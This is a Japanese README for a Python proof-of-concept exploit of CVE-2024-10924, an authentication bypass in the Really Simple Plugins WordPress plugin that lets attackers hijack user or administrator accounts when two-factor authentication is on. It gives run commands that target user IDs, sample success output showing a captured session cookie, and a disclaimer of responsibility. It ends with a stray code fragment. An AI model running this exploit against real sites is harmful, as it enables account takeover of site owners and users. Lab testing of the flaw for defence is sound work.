
CVE-2024-10924 用の POC(Python で記述)
Really Simple Plugins WordPress プラグインのREST APIにおけるエラーハンドリングの脆弱性(バージョン9.0.0から9.1.1.1まで、両端を含む)により、二要素認証が有効な場合、攻撃者は認証をバイパスし、既存のユーザーまたは管理者アカウントを乗っ取ることが可能です。
親切なことに、プラグインのバージョン9.1.1.1も同梱されています。解凍して wp-content/plugins フォルダにアップロードするだけです。プラグインを有効化し、2FAを有効にするのを忘れないでください。
pip を使用して必要な依存関係をインストールしてください:
pip install -r requirements.txt
python exploit.py [-id USER_ID] URL
特定のユーザーIDを指定する場合:
python exploit.py -id 10 http://localhost:8886/
これにより、ユーザーID 10 を使用してエクスプロイトペイロードが送信されます。
ユーザーIDを指定しない場合:
python exploit.py http://localhost
デフォルトではユーザーIDは 1 になります。
Exploit successful.
--------------------------------------------------
session_id=xyz123; path=/; HttpOnly
--------------------------------------------------
Exploit failed. Maybe the target is not vulnerable or the user ID is incorrect.
verify=False)。わからないが、私は一切の責任を負いません。